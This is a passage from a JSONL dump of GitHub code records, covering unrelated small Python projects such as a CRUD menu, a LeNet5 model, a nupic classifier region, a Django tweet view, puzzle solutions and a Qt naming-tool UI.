principal\\33[m'\nprint(linha)\nprint(titulo.center(50))\nprint(linha)\nprint(menu.center(50))\nprint(linha)\nopção = 0\nwhile opção != 5:\n    print(''' \n    \\33[1:33m1\\33[m - \\33[0:34mCadastrar Clientes\\33[m\n    \\33[1:33m2\\33[m - \\33[0:34mCadastrar Motos\\33[m\n    \\33[1:33m3\\33[m - \\33[0:34mComprar Motos\\33[m\n    \\33[1:33m4\\33[m - \\33[0:34mConsultar Vendas\\33[m\n    \\33[1:33m5\\33[m - \\33[0:34mSair\\33[m\n    ''')\n    opção = int(input(' O que deseja fazer? '))\n\n    if opção == 1:\n        clientes = []\n        while True:\n            clientes.append(str(input('Qual o seu nome? ')))\n            resp = str(input('Deseja cadastrar mais algum cliente?[S/N]'))\n            if resp in 'nN':\n                break\n    elif opção == 2:\n        motos = []\n        while True:\n            motos.append(str(input('Marca: ')))\n            motos.append(str(input('Modelo: ')))\n            motos.append(int(input('Ano: ')))\n            motos.append(float(input('Preço: ')))\n\n            resp = str(input('Quer adicionar mais motos? 
[S/N] '))\n if resp in 'nN':\n break","repo_name":"yanbernardo/tentativacrud2","sub_path":"AP2pratica_de_programação/venv/CRUD/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":1183,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23930029147","text":"import enum\n\n\nclass PhaseHandler:\n def __init__(self, agent):\n self.agent = agent\n\n # return true if phase is equal to current phase\n def phase_is(self, phase):\n return self.agent.phase == phase\n\n\nclass Phase(enum.Enum):\n CHOOSE_ROOM = 1\n GO_TO_ROOM = 2\n OPEN_DOOR = 3\n SEARCH_ROOM = 4\n CHOOSE_GOAL = 5\n GRAB_GOAL = 6\n DROP_GOAL = 7\n DONE = 8\n","repo_name":"plindhorst/Collaborative-Agent","sub_path":"Group58Agent/PhaseHandler.py","file_name":"PhaseHandler.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"13165571817","text":"import torch\nfrom torch import nn\n\nfrom hust_bearing.models.core import register_model\n\n\n@register_model(\"lenet5\")\nclass LeNet5(nn.Module):\n def __init__(self, num_classes: int) -> None:\n super().__init__()\n # 1st layer\n self.conv1 = nn.Conv2d(1, 6, kernel_size=5)\n self.tanh1 = nn.Tanh()\n self.pool1 = nn.AvgPool2d(kernel_size=2)\n # 2nd layer\n self.conv2 = nn.Conv2d(6, 16, kernel_size=5)\n self.tanh2 = nn.Tanh()\n self.pool2 = nn.AvgPool2d(kernel_size=2)\n # Flatten layer\n self.flatten = nn.Flatten()\n # 3rd layer\n self.fc3 = nn.Linear(16 * 13 * 13, 120)\n self.tanh3 = nn.Tanh()\n # 4th layer\n self.fc4 = nn.Linear(120, 84)\n self.tanh4 = nn.Tanh()\n # 5th layer\n self.fc5 = nn.Linear(84, num_classes)\n\n def forward(self, inputs: torch.Tensor) -> torch.Tensor:\n conv1 = self.pool1(self.tanh1(self.conv1(inputs)))\n conv2 = self.pool2(self.tanh2(self.conv2(conv1)))\n flatten = self.flatten(conv2)\n fc3 = self.tanh3(self.fc3(flatten))\n fc4 = self.tanh4(self.fc4(fc3))\n return self.fc5(fc4)\n","repo_name":"vuong-viet-hung/cwru-bearing-fault-classification","sub_path":"hust_bearing/models/lenet5.py","file_name":"lenet5.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"31132434201","text":"import numpy\nfrom PyRegion import PyRegion\nfrom nupic.algorithms.cla_classifier_factory import CLAClassifierFactory\n\n###############################################################################\nclass CLAClassifierRegion(PyRegion):\n \"\"\"\n CLAClassifierRegion implements a CLA specific classifier that accepts a binary\n input from the level below (the \"activationPattern\") and information from the\n sensor and encoders (the \"classification\") describing the input to the system\n at that time step.\n\n When learning, for every bit in activation pattern, it records a history of the\n classification each time that bit was active. The history is bounded by a\n maximum allowed age so that old entries are thrown away.\n\n For inference, it takes an ensemble approach. 
For every active bit in the\n activationPattern, it looks up the most likely classification(s) from the\n history stored for that bit and then votes across these to get the resulting\n classification(s).\n\n The caller can choose to tell the region that the classifications for\n iteration N+K should be aligned with the activationPattern for iteration N.\n This results in the classifier producing predictions for K steps in advance.\n Any number of different K's can be specified, allowing the classifier to learn\n and infer multi-step predictions for a number of steps in advance.\n \"\"\"\n \n###############################################################################\n @classmethod\n def getSpec(cls):\n ns = dict(\n description=CLAClassifierRegion.__doc__,\n singleNodeOnly=True,\n\n # The inputs and outputs are not used in this region because they are\n # either sparse vectors or dictionaries and hence don't fit the \"vector\n # of real\" input/output pattern.\n # There is a custom compute() function provided that accepts the\n # inputs and outputs.\n inputs=dict(\n categoryIn=dict(\n description='Category of the input sample',\n dataType='Real32',\n count=1,\n required=True,\n regionLevel=True,\n isDefaultInput=False,\n requireSplitterMap=False),\n\n bottomUpIn=dict(\n description='Belief values over children\\'s groups',\n dataType='Real32',\n count=0,\n required=True,\n regionLevel=False,\n isDefaultInput=True,\n requireSplitterMap=False),\n ),\n\n outputs=dict(),\n\n parameters=dict(\n learningMode=dict(\n description='Boolean (0/1) indicating whether or not a region '\n 'is in learning mode.',\n dataType='UInt32',\n count=1,\n constraints='bool',\n defaultValue=1,\n accessMode='ReadWrite'),\n\n inferenceMode=dict(\n description='Boolean (0/1) indicating whether or not a region '\n 'is in inference mode.',\n dataType='UInt32',\n count=1,\n constraints='bool',\n defaultValue=0,\n accessMode='ReadWrite'),\n\n steps=dict(\n description='Comma separated list of the desired steps of '\n 'prediction that the classifier should learn',\n dataType=\"Byte\",\n count=0,\n constraints='',\n defaultValue='1',\n accessMode='Create'),\n\n alpha=dict(\n description='The alpha used to compute running averages of the '\n 'bucket duty cycles for each activation pattern bit. 
A lower '\n 'alpha results in longer term memory',\n dataType=\"Real32\",\n count=1,\n constraints='',\n defaultValue=0.001,\n accessMode='Create'),\n\n implementation=dict(\n description='The classifier implementation to use.',\n accessMode='ReadWrite',\n dataType='Byte',\n count=0,\n constraints='enum: py, cpp'),\n\n clVerbosity=dict(\n description='An integer that controls the verbosity level, '\n '0 means no verbose output, increasing integers '\n 'provide more verbosity.',\n dataType='UInt32',\n count=1,\n constraints='',\n defaultValue=0 ,\n accessMode='ReadWrite'),\n\n ),\n commands=dict()\n )\n\n return ns\n\n ###############################################################################\n def __init__(self,\n steps='1',\n alpha=0.001,\n clVerbosity=0,\n implementation=None,\n ):\n\n # Convert the steps designation to a list\n self.steps = steps\n self.stepsList = eval(\"[%s]\" % (steps))\n self.alpha = alpha\n self.verbosity = clVerbosity\n\n # Initialize internal structures\n self._claClassifier = CLAClassifierFactory.create(\n steps=self.stepsList,\n alpha=self.alpha,\n verbosity=self.verbosity,\n implementation=implementation,\n )\n self.learningMode = True\n self.inferenceMode = False\n\n self._initEphemerals()\n\n\n ###############################################################################\n def _initEphemerals(self):\n pass\n\n\n ###############################################################################\n def initialize(self, dims, splitterMaps):\n pass\n\n ###############################################################################\n def clear(self):\n self._claClassifier.clear()\n\n\n ###############################################################################\n def getParameter(self, name, index=-1):\n \"\"\"\n Get the value of the parameter.\n\n @param name -- the name of the parameter to retrieve, as defined\n by the Node Spec.\n \"\"\"\n # If any spec parameter name is the same as an attribute, this call\n # will get it automatically, e.g. self.learningMode\n return PyRegion.getParameter(self, name, index)\n\n\n ###############################################################################\n def setParameter(self, name, index, value):\n \"\"\"\n Set the value of the parameter.\n\n @param name -- the name of the parameter to update, as defined\n by the Node Spec.\n @param value -- the value to which the parameter is to be set.\n \"\"\"\n if name == \"learningMode\":\n self.learningMode = bool(int(value))\n elif name == \"inferenceMode\":\n self.inferenceMode = bool(int(value))\n else:\n return PyRegion.setParameter(self, name, index, value)\n\n\n ###############################################################################\n def reset(self):\n pass\n\n\n ###############################################################################\n def compute(self, inputs, outputs):\n \"\"\"\n Process one input sample.\n This method is called by the runtime engine.\n\n We don't use this method in this region because the inputs and outputs don't\n fit the standard \"vector of reals\" used by the engine. Instead, call\n the customCompute() method directly\n \"\"\"\n\n pass\n\n ###############################################################################\n def customCompute(self, recordNum, patternNZ, classification):\n \"\"\"\n Process one input sample.\n This method is called by outer loop code outside the nupic-engine. 
We\n use this instead of the nupic engine compute() because our inputs and\n outputs aren't fixed size vectors of reals.\n\n Parameters:\n --------------------------------------------------------------------\n patternNZ: list of the active indices from the output below\n classification: dict of the classification information:\n bucketIdx: index of the encoder bucket\n actValue: actual value going into the encoder\n\n retval: dict containing inference results, one entry for each step in\n self.steps. The key is the number of steps, the value is an\n array containing the relative likelihood for each bucketIdx\n starting from bucketIdx 0.\n\n for example:\n {1 : [0.1, 0.3, 0.2, 0.7]\n 4 : [0.2, 0.4, 0.3, 0.5]}\n \"\"\"\n\n return self._claClassifier.compute( recordNum=recordNum,\n patternNZ=patternNZ,\n classification=classification,\n learn = self.learningMode,\n infer = self.inferenceMode)\n\n\n\n###############################################################################\nif __name__=='__main__':\n from nupic.engine import Network\n n = Network()\n classifier = n.addRegion(\n 'classifier',\n 'py.CLAClassifierRegion',\n '{ steps: \"1,2\", maxAge: 1000}'\n )\n","repo_name":"tkaitchuck/nupic","sub_path":"py/regions/CLAClassifierRegion.py","file_name":"CLAClassifierRegion.py","file_ext":"py","file_size_in_byte":8867,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"74630805633","text":"# Fibonacci numbers module\r\n\r\ndef fib(n): # write Fibonacci series up to n\r\n a, b = 0, 1\r\n while a < n:\r\n print(a, end=' ')\r\n a, b = b, a+b\r\n print()\r\n\r\ndef fib2(n): # return Fibonacci series up to n\r\n result = []\r\n a, b = 0, 1\r\n while a < n:\r\n result.append(a)\r\n a, b = b, a+b\r\n return result\r\n\r\n''' COMO CONSTRUIR MÓDULOS\r\nImporte esse módulo com o seguinte comando:\r\n\r\n>>> import d.fibo\r\nThis does not add the names of the functions defined in fibo directly to the current namespace (see Escopos e espaços de nomes do Python for more details); it only adds the module name fibo there. 
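(Note: 'import d.fibo' binds the name 'd', so these calls would really be written 'd.fibo.fib(1000)'; the unqualified 'fibo.fib(1000)' examples below assume a plain 'import fibo'.) 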
Using the module name you can access the functions:\r\n\r\n>>> fibo.fib(1000)\r\n...0 1 1 2 3 5 8 13 21 34 55 89 144 233 377 610 987\r\n>>> fibo.fib2(100)\r\n[0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89]\r\n>>> fibo.__name__\r\n'fibo'\r\nSe pretender usar uma função muitas vezes, você pode atribui-lá a um nome local:\r\n\r\n>>>\r\n>>> fib = fibo.fib\r\n>>> fib(500)\r\n0 1 1 2 3 5 8 13 21 34 55 89 144 233 377\r\n'''","repo_name":"Danilex22/I-N-I-C-I-A-N-T-E-S---Top-10-projetos-python","sub_path":"d.fibo.py","file_name":"d.fibo.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"30552080023","text":"# Determine the time when a capsule can be dropped based on the rotation of several discs\n\n\nclass Disc:\n def __init__(self, positions, start):\n self.positions = positions\n self.current = start\n\n\n'''\ndiscs = [\n Disc(5, 4),\n Disc(2, 1)\n]\n'''\n\n'''\nDisc #1 has 13 positions; at time=0, it is at position 11.\nDisc #2 has 5 positions; at time=0, it is at position 0.\nDisc #3 has 17 positions; at time=0, it is at position 11.\nDisc #4 has 3 positions; at time=0, it is at position 0.\nDisc #5 has 7 positions; at time=0, it is at position 2.\nDisc #6 has 19 positions; at time=0, it is at position 17.\n'''\ndiscs = [\n Disc(13, 11),\n Disc(5, 0),\n Disc(17, 11),\n Disc(3, 0),\n Disc(7, 2),\n Disc(19, 17),\n Disc(11, 0) # This is new for part 2\n]\n\n\nif __name__ == '__main__':\n print(\"Starting Day 15-1/2\")\n\n # For this we can just start at a certain time, check where each disc will be at each following second and see if\n # they all end up being zero using modulo math\n start_time = 0\n got_through = False\n while not got_through:\n got_through = True\n time = start_time + 1\n for index in range(len(discs)):\n position = (discs[index].current + time + index) % discs[index].positions\n if position != 0:\n got_through = False\n break\n\n if not got_through:\n start_time += 1\n\n # Print out answer\n print(\"The first start time that works is {0!s}\".format(start_time))\n","repo_name":"theknoxinator/AoC","sub_path":"2016/Day15/day15-1.py","file_name":"day15-1.py","file_ext":"py","file_size_in_byte":1502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16419242353","text":"import pickle\nfrom django.http import JsonResponse, HttpResponse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom rest_framework.decorators import api_view\nimport numpy as np\nimport ML.queries as query\nimport ML.search_api as search_api\n\n# Create your views here.\n\n\n@api_view(['GET', 'POST'])\n@csrf_exempt\ndef fetchTweets(request):\n if request.method == 'GET':\n return HttpResponse('
it was a get
')\n elif request.method == 'POST':\n print(request.data)\n data = []\n labels = []\n tweetContent = {}\n tweet_data = None\n if request.data['keyword'] == 'general':\n tweet_data = search_api.hit_search_api(query.general, 10)\n elif request.data['keyword'] == 'immediate':\n tweet_data = search_api.hit_search_api(query.immediate, 10)\n elif request.data['keyword'] == 'twittersos':\n tweet_data, labels = search_api.run_model_on_search(\n query.twittersos, 10)\n for index, tweet in enumerate(tweet_data):\n tweetContent[\"tweet.id\"] = tweet.id\n tweetContent[\"tweet.text\"] = tweet.text\n tweetContent[\"tweet.created_at\"] = tweet.created_at\n tweetContent[\"tweet.user.name\"] = tweet.user.name\n tweetContent[\"tweet.user.profile_image_url_https\"] = tweet.user.profile_image_url_https\n tweetContent[\"tweet.user.screen_name\"] = tweet.user.screen_name\n if len(labels) > 1:\n tweetContent[\"status\"].append(label[index])\n data.append(tweetContent)\n return JsonResponse(data, safe=False)\n","repo_name":"Mugunthanraju/Emergency-Tweets","sub_path":"emergencyTweets/tweets/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1609,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"27267826743","text":"from pytube import YouTube\r\nfrom sys import argv\r\n\r\nlink=argv[1]\r\nyt=YouTube(link)\r\n\r\nprint(\"Title: \",yt.title)\r\n\r\nprint(\"Views:\" , yt.views)\r\n\r\nyd= yt.streams.get_highest_resolution()\r\n\r\nyd.download(\"C:/Users/murabıt/Desktop/ytDownload\")\r\n\r\n#in windows you need to type python ytDownloader.py \"youtube link\"\r\n","repo_name":"dogamur/python_projects","sub_path":"ytDownloader.py","file_name":"ytDownloader.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23422899581","text":"rate = 2.0\n\nfile_input = open('CookieClickerAlpha_input')\nfile_output = open('CookieClickerAlpha_output', 'w')\n\ninput = file_input.readline\nprint = file_output.write\n\nT = int(input())\n\n# Rate as a function of i farms\ndef R(F, i):\n\treturn F*i + rate\n\n# Time needed to aquire the ith farm\ndef t(C, F, i):\n\treturn C/R(F, i - 1) # Rate when we own i - 1 farms\n\n# Time taken to reach X based on number of farms we buy\ndef total_time(C, F, X, n):\n\ttime = 0.0\n\tfor i in range(1, n + 1):\n\t\ttime += t(C, F, i)\n\treturn time + X/R(F, n) # Rate after aquiring i farms = R(i)\n\nfor i in range(T):\n\tC, F, X = list(map(float, input().split()))\n\tnFarms = 0\n\tlastTime = float('inf') # Infinite time\n\twhile(True):\n\t\ttime = total_time(C, F, X, nFarms)\n\t\tif time > lastTime:\n\t\t\tbreak\n\t\tnFarms += 1\n\t\tlastTime = time\n\tprint('Case #' + str(i + 1) + ': ' + str(lastTime) + '\\n')\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_136/1772.py","file_name":"1772.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5130264616","text":"import picamera\nfrom time import sleep\n\ncamera = picamera.PiCamera()\ncamera.resolution = (1024,768)\ncamera.brightness = 
60\ncamera.start_recording(\"/home/ameya/Documents/demo.h264\")\ncamera.wait_recording(5)\ncamera.stop_recording()\ncamera.close()\nprint(\"goodbye\")\n\n","repo_name":"dangercomix07/Airdrop-Flipkart-Robotics-Grid-challenge","sub_path":"camera_testing.py","file_name":"camera_testing.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25266084891","text":"import os\nfrom functools import partial\nfrom glob import glob\n\nimport Qt.QtCore as QtCore\nimport Qt.QtGui as QtGui\nimport Qt.QtWidgets as QtWidgets\n\nimport nomenclate.settings as settings\nimport nomenclateUI.components.gui_save as gui_save\nimport nomenclateUI.instance_handler as instance_handler\nimport nomenclateUI.object_list as object_list\nimport nomenclateUI.utils as utils\nimport nomenclateUI.components.default as default\nimport nomenclateUI.platforms as platforms\n\nMODULE_LOGGER_LEVEL_OVERRIDE = settings.INFO\n\n\nclass UISetting(object):\n def __init__(self, default_value=None):\n self.default_value = default_value\n self.value = default_value\n\n @property\n def is_default(self):\n return self.default == self.value\n\n @property\n def default(self):\n return self.default\n\n def get(self):\n return self.value\n\n def set_default(self):\n self.value = self.default\n\n def set(self, value):\n self.value = value\n\n\nclass MainDialog(default.DefaultWindow, utils.Cacheable):\n LOG = settings.get_module_logger(__name__, module_override_level=MODULE_LOGGER_LEVEL_OVERRIDE)\n\n file_saved = QtCore.Signal()\n dropped_files = QtCore.Signal(list)\n update_stylesheet = QtCore.Signal()\n update_color_coded = QtCore.Signal(str, list, bool)\n\n NAME = 'Nomenclate'\n WIDTH = 800\n HEIGHT = 600\n\n DEFAULT_MODIFIER = 'Shift'\n DEFAULT_QSS = 'default.qss'\n DARK_TEXT_QSS = 'text-on-light.qss'\n LIGHT_TEXT_QSS = 'text-on-dark.qss'\n MAIN_QSS = 'dark-too-cool.qss'\n QSS_GLOB = '*.qss'\n\n default_css_cache = None\n\n dark = UISetting(True)\n color_coded = UISetting(True)\n last_action_cache = None\n current_stylesheet = ''\n\n format_history = []\n\n def __init__(self, *args, **kwargs):\n super(MainDialog, self).__init__(*args, **kwargs)\n self.file_menu = None\n self.edit_menu = None\n self.view_menu = None\n self.format_menu = None\n self.presets_menu = None\n self.presets_list_menu = None\n\n self.add_fonts()\n self.setup_menubar()\n self.populate_presets()\n self.load_state()\n self.update_stylesheet.emit()\n QtWidgets.QApplication.instance().installEventFilter(self)\n\n @property\n def focused_widget(self):\n return QtWidgets.QApplication.focusWidget()\n\n @property\n def default_stylesheet(self):\n return self.get_stylesheet_qss(self.DEFAULT_QSS)\n\n @property\n def text_stylesheet(self):\n text_stylesheet = self.LIGHT_TEXT_QSS if self.dark.get() else self.DARK_TEXT_QSS\n return self.get_stylesheet_qss(text_stylesheet)\n\n def combined_stylesheet(self):\n return self.current_stylesheet + self.default_stylesheet + self.text_stylesheet\n\n def create_controls(self):\n main_widget = self\n if isinstance(self, QtWidgets.QMainWindow):\n self.setCentralWidget(QtWidgets.QWidget())\n main_widget = self.centralWidget()\n\n self.layout_main = QtWidgets.QVBoxLayout(main_widget)\n self.menu_bar = QtWidgets.QMenuBar()\n self.wgt_drop_area = QtWidgets.QWidget()\n self.wgt_header = QtWidgets.QWidget()\n self.wgt_files = QtWidgets.QFrame()\n self.wgt_stack = QtWidgets.QStackedWidget()\n\n self.header_layout = QtWidgets.QHBoxLayout()\n 
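# ---------------------------------------------------------------------
# [Editor's aside] A worked example for the Cookie Clicker maths in the
# record further up (R, t and total_time); the helper name and input
# values below are assumed purely for illustration. With C=30.0, F=1.0,
# X=2.0 and the base rate of 2.0 cookies/sec:
#   buying 0 farms: total = X / 2.0                 = 1.0 s
#   buying 1 farm : total = C / 2.0 + X / (2.0 + F) ~= 15.667 s
# so total_time rises immediately and the search stops at 0 farms.
def _cookie_clicker_check():
    C, F, X, rate = 30.0, 1.0, 2.0, 2.0
    assert X / rate == 1.0                                      # 0 farms
    assert abs(C / rate + X / (rate + F) - 15.6666667) < 1e-6   # 1 farm
#
# [Editor's aside] Two likely bugs in the fetchTweets view further up,
# with sketched fixes (not the author's code):
#   1. `tweetContent["status"].append(label[index])` raises NameError:
#      the list is named `labels`, and "status" is never initialised as
#      a list -- `tweetContent["status"] = labels[index]` was probably
#      intended (guarded by `len(labels) > 0`, not `> 1`, so a single
#      label is not silently dropped).
#   2. `tweetContent = {}` is created once outside the loop, so `data`
#      ends up holding N references to the same dict; creating it at
#      the top of the `for` loop gives one dict per tweet.
# ---------------------------------------------------------------------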
self.header_label = QtWidgets.QLabel()\n self.files_layout = QtWidgets.QHBoxLayout()\n\n self.instance_handler = instance_handler.InstanceHandlerWidget(parent=self)\n self.object_list = object_list.FileListWidget()\n\n def connect_controls(self):\n self.setLayout(self.layout_main)\n\n self.wgt_header.setLayout(self.header_layout)\n self.header_layout.addWidget(self.header_label)\n\n self.layout_main.addWidget(self.menu_bar)\n self.layout_main.addWidget(self.wgt_header)\n self.layout_main.addWidget(self.instance_handler)\n self.layout_main.addWidget(self.wgt_stack)\n\n self.wgt_stack.addWidget(self.object_list)\n self.wgt_stack.addWidget(self.wgt_drop_area)\n\n self.dropped_files.connect(self.object_list.populate_objects)\n self.dropped_files.connect(lambda: self.wgt_stack.setCurrentIndex(0))\n\n self.object_list.request_name.connect(self.instance_handler.generate_name)\n self.instance_handler.name_generated.connect(self.object_list.set_item_name)\n self.object_list.request_state.connect(self.context_menu_state)\n\n self.instance_handler.format_updated.connect(self.update_format_history)\n self.instance_handler.format_updated.connect(self.object_list.reset_incrementer)\n self.instance_handler.nomenclate_output.connect(self.object_list.get_object_names)\n self.dropped_files.connect(self.object_list.get_object_names)\n\n self.update_stylesheet.connect(self.set_stylesheet)\n self.update_color_coded.connect(self.instance_handler.format_updated)\n self.file_saved.connect(self.populate_presets)\n\n def context_menu_state(self, qpoint, qitem):\n self.object_list.context_menu_for_item(qpoint,\n qitem,\n self.instance_handler.NOM)\n\n def initialize_controls(self):\n font = QtWidgets.QApplication.font()\n font.setStyleStrategy(font.PreferAntialias)\n QtWidgets.QApplication.setFont(font)\n # self.setWindowOpacity(0.96)\n\n self.setFocus(QtCore.Qt.PopupFocusReason)\n self.load_stylesheet(stylesheet=self.MAIN_QSS)\n self.setWindowTitle(self.NAME)\n self.setObjectName('MainFrame')\n self.setAttribute(QtCore.Qt.WA_DeleteOnClose)\n self.setAcceptDrops(True)\n\n self.wgt_stack.setObjectName('Stack')\n self.wgt_header.setObjectName('HeaderWidget')\n self.header_label.setObjectName('HeaderLabel')\n\n self.header_label.setText(self.NAME.upper())\n self.layout_main.setContentsMargins(0, 0, 0, 0)\n self.layout_main.setSpacing(0)\n self.setBaseSize(self.WIDTH, self.HEIGHT)\n self.layout_main.setAlignment(QtCore.Qt.AlignTop)\n self.instance_handler.fold()\n\n def setup_menubar(self):\n self.file_menu = self.menu_bar.addMenu('File')\n self.edit_menu = self.menu_bar.addMenu('Edit')\n self.view_menu = self.menu_bar.addMenu('View')\n self.format_menu = self.edit_menu.addMenu('Previous Formats')\n self.presets_menu = self.create_presets_menu()\n self.presets_list_menu = self.presets_menu.addMenu('User Presets')\n view_action_color_code = self.view_menu.addAction('Color code tokens')\n view_action_color_code.setShortcut('Ctrl+E')\n view_action_color_code.triggered.connect(self.set_color_coded)\n\n view_action_refresh = self.view_menu.addAction('Refresh StyleSheets from Folder')\n view_action_refresh.setShortcut('Ctrl+U')\n view_action_refresh.triggered.connect(lambda: self.run_action(self.populate_qss_styles, None))\n\n view_action = self.view_menu.addAction('Expand/Collapse Tokens')\n view_action.setShortcut('Ctrl+H')\n view_action.triggered.connect(lambda: self.run_action(self.instance_handler.fold, None))\n\n view_action = self.view_menu.addAction('Swap Light/Dark Text')\n view_action.setShortcut('Ctrl+T')\n 
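# ---------------------------------------------------------------------
# [Editor's aside] UISetting.default, defined near the top of this
# file, returns `self.default` from inside the `default` property
# itself, so reading it (or is_default, which calls it) recurses until
# RecursionError. A minimal corrected sketch, assuming the backing
# attribute is the `default_value` set in __init__:
#
#     @property
#     def default(self):
#         return self.default_value
# ---------------------------------------------------------------------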
view_action.triggered.connect(lambda: self.run_action(self.set_color_mode, None))\n\n repeat_action = self.edit_menu.addAction('Repeat last menu action')\n repeat_action.setShortcut('Ctrl+G')\n repeat_action.triggered.connect(self.repeat_last_action)\n\n exit_action = self.file_menu.addAction('Exit and Save')\n exit_action.setShortcut('Ctrl+Q')\n exit_action.triggered.connect(lambda: self.close(True))\n\n exit_no_save_action = self.file_menu.addAction('Exit without saving...')\n exit_no_save_action.setShortcut('Ctrl+%s+Q' % self.DEFAULT_MODIFIER)\n exit_no_save_action.triggered.connect(lambda: self.close(False))\n\n self.populate_qss_styles()\n\n def create_presets_menu(self):\n self.presets_menu = self.menu_bar.addMenu('Presets')\n presets_action_load_from_config = self.presets_menu.addAction('Reload defaults from config.yml')\n presets_action_load_from_config.triggered.connect(self.instance_handler.load_settings_from_config)\n\n edit_action_load_last_format = self.presets_menu.addAction('Clear all fields')\n edit_action_load_last_format.setShortcut('Ctrl+R')\n edit_action_load_last_format.triggered.connect(self.restore_defaults)\n\n edit_action_load_last_format = self.presets_menu.addAction('Load last format')\n edit_action_load_last_format.setShortcut('Ctrl+D')\n edit_action_load_last_format.triggered.connect(lambda: self.load_format(None))\n\n save_action = self.presets_menu.addAction('Save Window Settings')\n save_action.setShortcut('Ctrl+S')\n save_action.triggered.connect(lambda: self.run_action(self.save_state, None, False))\n\n load_action = self.presets_menu.addAction('Reload Current Preset')\n load_action.setShortcut('Ctrl+L')\n load_action.triggered.connect(lambda: self.run_action(self.load_state, None, False))\n return self.presets_menu\n\n def load_format(self, input_format, *args):\n if not self.format_history:\n self.LOG.warning('No format history')\n return\n elif input_format is None:\n # Swap two last formats\n if len(self.format_history) > 1:\n self.format_history = [self.format_history[1], self.format_history[0]]\n\n if len(self.format_history) > 2:\n self.format_history = self.format_history + self.format_history[2:]\n\n input_format = self.format_history[0]\n else:\n self.format_history.remove(input_format)\n self.format_history.insert(0, input_format)\n if input_format != self.instance_handler.input_format.text_utf:\n self.LOG.info('Swapping format %s with current %s' % (input_format,\n self.instance_handler.input_format.text_utf))\n self.instance_handler.input_format.setText(input_format)\n self.refresh_format_history_menu()\n\n def update_format_history(self, format_string, format_order, swapped):\n if not format_string in self.format_history:\n self.format_history.insert(0, format_string)\n self.refresh_format_history_menu()\n\n def refresh_format_history_menu(self):\n self.format_menu.clear()\n for format_history in self.format_history:\n menu_action = self.format_menu.addAction(format_history)\n action = partial(self.run_action, self.load_format, None, format_history)\n menu_action.triggered.connect(action)\n\n def restore_defaults(self):\n gui_save.WidgetState.restore_state(self, defaults=True)\n\n def save_state(self, mode=False, quit_mode=False):\n result = None if not mode else QtWidgets.QFileDialog.getSaveFileName(self, 'Save UI Settings',\n gui_save.NomenclateFileContext.DEFAULT_PRESETS_PATH,\n filter='*.json')\n result = self.process_dialog_result(result)\n gui_save.WidgetState.generate_state(self, fullpath_override=result)\n if not quit_mode:\n 
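# ---------------------------------------------------------------------
# [Editor's aside] The "swap two last formats" branch of load_format
# further up drops history: it first reassigns format_history to the
# two-element swapped pair, so the following `len(...) > 2` check can
# never be true and entries beyond the first two are lost. A sketched
# fix (not the author's code) is to build the list in one step:
#
#     if len(self.format_history) > 1:
#         self.format_history = ([self.format_history[1],
#                                 self.format_history[0]]
#                                + self.format_history[2:])
# ---------------------------------------------------------------------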
self.file_saved.emit()\n\n def load_state(self, mode=False):\n result = None if not mode else QtWidgets.QFileDialog.getOpenFileName(self, 'Load UI Settings',\n gui_save.NomenclateFileContext.DEFAULT_PRESETS_PATH,\n filter='*.json')\n result = self.process_dialog_result(result)\n gui_save.WidgetState.restore_state(self, fullpath_override=result)\n\n @staticmethod\n def process_dialog_result(path):\n if path is None:\n return path\n path, file_filter = path\n if not path:\n return None\n path = os.path.normpath(path)\n ext = file_filter.replace('*', '')\n return path if path.endswith(ext) else path + ext\n\n def run_action(self, action_function, qevent, *args, **kwargs):\n self.LOG.debug('Recording + running action %s with qevent %s and args %s, kwargs %s' % (action_function,\n qevent,\n args,\n kwargs))\n self.last_action_cache = {'function': action_function, 'args': args, 'kwargs': kwargs, 'event': qevent}\n action_function(*args, **kwargs)\n\n def repeat_last_action(self):\n if self.last_action_cache is not None:\n self.last_action_cache['function'](*self.last_action_cache['args'], **self.last_action_cache['kwargs'])\n\n def set_color_coded(self):\n self.color_coded.set(not self.color_coded.get())\n self.update_color_coded.emit(self.instance_handler.NOM.format, self.instance_handler.NOM.format_order, True)\n\n def set_color_mode(self, mode=None):\n if mode:\n self.dark.set(mode)\n else:\n self.dark.set(not self.dark.get())\n self.update_stylesheet.emit()\n\n def populate_presets(self):\n self.presets_list_menu.clear()\n\n self.LOG.info('Found %d presets...populating with %s' % (len(gui_save.WidgetState.list_presets()),\n sorted(gui_save.WidgetState.list_presets())))\n for preset_file in sorted(gui_save.WidgetState.list_presets()):\n menu_action = self.presets_list_menu.addAction(os.path.basename(preset_file))\n menu_action.triggered.connect(partial(self.run_action,\n gui_save.WidgetState.restore_state,\n None,\n self,\n fullpath_override=preset_file))\n self.presets_list_menu.addSeparator()\n self.LOG.debug('Re-adding load/save preset actions...')\n preset_load_action = self.presets_list_menu.addAction(u'Load Preset...')\n preset_load_action.setShortcut('Ctrl+%s+L' % self.DEFAULT_MODIFIER)\n preset_load_action.triggered.connect(lambda: self.run_action(self.load_state, None, True))\n\n preset_save_action = self.presets_list_menu.addAction(u'Save New Preset...')\n preset_save_action.setShortcut('Ctrl+%s+S' % self.DEFAULT_MODIFIER)\n 